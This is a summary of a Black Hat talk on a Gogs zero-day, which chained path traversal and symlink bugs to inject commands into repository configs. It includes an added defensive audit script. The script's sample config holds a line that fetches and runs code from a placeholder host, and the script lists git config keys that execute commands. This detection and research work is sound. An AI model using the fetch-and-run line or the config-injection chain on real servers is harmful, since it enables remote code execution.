Black Hat Europe 2025 | From Live Exploitation to Zero-Day Discovery: Investigating Attacks on Gogs

Black Hat | Jun 4, 2026

Why It Matters

Unpatched self‑hosted Git services can become a silent conduit for widespread remote code execution, demanding proactive monitoring and rapid patching of both code and configuration flaws.

Key Takeaways

  • Live malware alert led to discovery of a zero‑day in Gogs.
  • Exploited path‑traversal and symlink bugs allowed arbitrary file writes.
  • Attackers leveraged open repository creation to gain remote code execution.
  • Over 700 Gogs instances worldwide were compromised using unique patterns.
  • Behavioral indicators like repository names can reveal large‑scale compromises.

Summary

The Black Hat Europe 2025 talk detailed how a routine YARA‑based malware alert uncovered a previously unknown zero‑day vulnerability in the self‑hosted Git service Gogs. Researchers from Wiz traced the infection on a customer’s cloud server, ruled out common entry points, and eventually linked the breach to two unpatched bugs—a path‑traversal flaw in the put‑contents API and a symlink‑editing weakness in the web editor.

By chaining these flaws, an attacker could create a repository, commit a symbolic link to the .git/config file, and overwrite it via the API, injecting arbitrary commands that execute when Gogs accesses the repository. The exploit required only the default, publicly accessible repository creation feature, allowing remote code execution and exfiltration of sensitive files such as /etc/passwd.

The presenters demonstrated the attack live, showing how the malicious repository appeared with eight‑character random names and how a simple Python scanner identified the same pattern on hundreds of exposed Gogs instances. Shodan queries revealed roughly 1,500 public Gogs servers, and the custom script flagged over 700 compromised hosts, confirming a widespread campaign.

The incident underscores the risk of self‑hosted development tools that lack rigorous update cycles and default open‑access settings. It also highlights the value of behavioral indicators—like unique repository naming patterns—as powerful IOCs for detecting large‑scale compromises beyond traditional hash or IP signatures.
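As an added example (not part of the talk or of Wiz's tooling), the following Python audit applies the two indicators described above to repositories stored on a Gogs host: it parses each bare repository's config for git keys whose values git executes as commands, and flags eight-character repository names. The repository root layout, the character set of the random names and the specific config key abused in the campaign are assumptions, and the sample config is constructed.

```python
import re
from pathlib import Path

# Constructed sample bare-repo config; the key abused in the campaign is not
# named in the summary, so the audit flags any key git hands to a shell.
SAMPLE_CONFIG = """[core]
\trepositoryformatversion = 0
\tbare = true
\tsshCommand = sh -c 'curl -s http://placeholder.invalid/x | sh'
[receive]
\tdenyNonFastForwards = false
"""
SECTION_RE = re.compile(r'^\[(\w+)(?:\s+"([^"]*)")?\]\s*$')
KEY_RE = re.compile(r'^\s*([\w-]+)\s*=\s*(.*?)\s*$')
# git config keys that make git run a command (not exhaustive); a subsection
# name such as [filter "lfs"] is normalised to '*'
COMMAND_KEYS = {"core.sshcommand", "core.fsmonitor", "core.hookspath", "diff.*.textconv",
                "diff.*.command", "filter.*.clean", "filter.*.smudge", "filter.*.process",
                "merge.*.driver"}
RANDOM_NAME_RE = re.compile(r"^[a-z0-9]{8}$")  # assumed charset of the 8-char names

def parse_git_config(text):
    """Return (dotted key, value) pairs from git config text; keys lowercased."""
    section, pairs = None, []
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1).lower() + (".*" if m.group(2) is not None else "")
            continue
        m = KEY_RE.match(line)
        if m and section:
            pairs.append((f"{section}.{m.group(1).lower()}", m.group(2)))
    return pairs

def suspicious_config_keys(text):
    """Config entries that would execute a command whenever git touches the repo."""
    return [(k, v) for k, v in parse_git_config(text) if k in COMMAND_KEYS]

def audit_repo(name, config_text):
    """Combine the config indicator with the naming indicator for one repository."""
    findings = [f"config:{k}" for k, _ in suspicious_config_keys(config_text)]
    if RANDOM_NAME_RE.match(name):
        findings.append("name:8char-random")
    return findings

def audit_repo_root(root):
    """Walk <root>/<owner>/<repo>.git/config (assumed Gogs layout); map repo -> findings."""
    return {str(c.parent): f for c in Path(root).glob("*/*.git/config")
            if (f := audit_repo(c.parent.name[:-4], c.read_text(errors="replace")))}
```

Run `audit_repo_root` against the Gogs repository root on the server; a config hit is a strong signal on its own, while the naming hit is weak alone and is best used to prioritise review.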

Original Description

A single infected server led us into a much larger story. While investigating suspicious repositories on exposed **** Git servers, we uncovered signs of active exploitation: commands hidden inside repository configurations, payloads fetching remote shells, and infrastructure linked to a custom-packed Supershell C2. What at first looked like an opportunistic abuse of a known bug turned out to be something more: an unpatched zero-day vulnerability, already being leveraged in the wild.

While an older RCE was known, the affected systems matched a yet-unknown exploit chain. This mismatch was the first clue that attackers were using a new vulnerability, rather than simply reusing a patched one.

In this talk, we will retrace that investigation. Starting from live exploitation artifacts, we will show how we correlated repositories across multiple tenants, fingerprinted vulnerable internet-facing servers, and pieced together the attack chain. Our scans revealed over 700 compromised **** instances worldwide, with dozens already updated yet still showing signs of compromise. The evidence demonstrated that attackers had a working exploit before disclosure.

We will close with lessons learned for defenders. These include how to detect malicious repository abuse in developer platforms, techniques for hunting zero-days from threat intelligence leads, and what this case study means for the broader risk landscape of self-hosted developer tools.

By:
Gili Tikochinski | Malware Researcher, Wiz
Yaara Shriki | Threat Researcher, Wiz
